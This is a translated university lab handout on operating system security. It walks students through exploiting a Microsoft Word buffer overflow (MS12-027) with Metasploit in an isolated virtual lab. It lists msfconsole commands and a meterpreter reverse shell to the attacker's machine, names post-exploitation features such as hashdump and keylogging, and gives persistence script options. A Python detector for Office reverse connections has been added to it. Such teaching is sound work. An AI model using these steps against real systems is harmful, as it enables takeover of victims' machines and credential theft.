OPERATING SYSTEM SECURITY
HANOI, 2015
GENERAL INFORMATION ABOUT THE LAB
Lab title: Exploiting software vulnerabilities with Metasploit
Module:
Number of students working together: 01
Lab location: Computer room
Requirements:
Hardware requirements:
Each student is assigned 01 computer with a minimum configuration of: CPU 2.0 GHz, RAM 2GB, HDD 50GB
Software requirements on the machine:
VMware Workstation 9.0 or later
Lab tools:
VMware virtual machines: Windows XP SP3, Kali Linux.
Microsoft Office 2007
LAN connection required: Yes
Internet connection required: No
Other requirements: projector, writing board, board markers/chalk
Tools provided with this document:
LAB PREPARATION
For the instructor
Before the class, the instructor (the lab supervisor) needs to check that the actual conditions of the lab room match the requirements of the lab.
Nothing further is required.
For students
Before starting the lab, create copies of the virtual machines to be used. Also locate where the tools listed in the requirements section are stored.
PART 1. EXPLOITING SOFTWARE VULNERABILITIES WITH METASPLOIT
As we know, the best-known and most widely used word processor today is Microsoft Word, part of the Microsoft Office suite from the software company Microsoft.
This is exactly what makes Microsoft Word an environment that hackers abuse to attack, exploit and steal information on a user's machine when the user opens a document that contains malicious code.
This is a buffer overflow flaw discovered in Microsoft Word. With this flaw, a user who opens a Word document unknowingly executes malicious code that gives the attacker control of the system.
Word documents can be embedded in other documents in the Microsoft Office suite, such as Excel and PowerPoint. Opening any document that embeds a Word document containing malicious code still causes that code to run on the victim's machine.
Step 3: The file containing malicious code exploits the vulnerability in Microsoft Word and creates a backdoor that connects back to the attacker's machine, letting the attacker take control of the victim's machine.
One of the payloads hackers commonly use is meterpreter, simply because it is hard to detect and supports many options while exploiting the victim's machine, such as keylog, webcam, hashdump… The reverse_tcp value used in the command parameters makes the connection go back to the attacker's machine. Put simply, the attacker's machine opens a port in advance and waits for the victim machine to connect to it.
msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.121.128
msf exploit(ms12_027_mscomctl_bof) > exploit
msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/baithuchanh.doc /root/Desktop
The malicious code is injected from machine 192.168.121.128:4444 to machine 192.168.121.126:1048
So there is now 1 session connected to the victim's machine.
Type getuid to see the username, getinfo to see machine information, ls C:\ to view the drive, mkdir to create a directory; in short, the attacker fully controls the victim's machine.
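The reverse connection described above, seen from the defender's side, as an added example that is not part of the original lab document: it scans process network events and flags outbound TCP connections opened by Office applications to ports outside a small allowlist. The key=value log format, the process and port lists, and the sample events are assumptions constructed for illustration; only the two lab addresses come from the text.

```python
import ipaddress

# Assumption: Office binaries whose outbound connections are worth reviewing.
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Assumption: destination ports a document editor may legitimately reach.
EXPECTED_PORTS = {80, 443, 8080}

# Constructed sample events (hypothetical key=value format, not a real product's log).
SAMPLE_EVENTS = """\
ts=09:14:07 proc=WINWORD.EXE src=192.168.121.126:1048 dst=192.168.121.128:4444 dir=outbound
ts=09:14:09 proc=iexplore.exe src=192.168.121.126:1050 dst=192.168.121.1:80 dir=outbound
ts=09:15:30 proc=EXCEL.EXE src=192.168.121.126:1061 dst=192.168.121.10:443 dir=outbound
ts=09:16:02 proc=svchost.exe src=192.168.121.5:49152 dst=192.168.121.126:445 dir=inbound
malformed line without fields
"""


def parse_event(line):
    """Return a dict of fields, or None when the line is not a well-formed event."""
    fields = dict(part.split("=", 1) for part in line.split() if "=" in part)
    if not {"proc", "src", "dst", "dir"} <= fields.keys():
        return None
    try:
        for key in ("src", "dst"):
            host, port = fields[key].rsplit(":", 1)
            fields[key] = (ipaddress.ip_address(host), int(port))
    except ValueError:  # missing port, bad address or non-numeric port
        return None
    return fields


def find_reverse_connections(log_text):
    """Flag outbound connections from Office processes to unexpected ports."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None or event["dir"] != "outbound":
            continue
        dst_host, dst_port = event["dst"]
        if event["proc"].lower() in OFFICE_PROCESSES and dst_port not in EXPECTED_PORTS:
            alerts.append((event["proc"], str(dst_host), dst_port))
    return alerts


if __name__ == "__main__":
    for proc, host, port in find_reverse_connections(SAMPLE_EVENTS):
        print(f"ALERT: {proc} opened an outbound connection to {host}:{port}")
```

The rule keys on which process dials out rather than on port 4444 itself, so it still fires when the listener uses any other port outside the allowlist.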
Here we see some important parameters:
-X start together with the system
-i the listening interval between connections
-p the connection port
-r the IP address of the Attacker machine
Run the script using msfconsole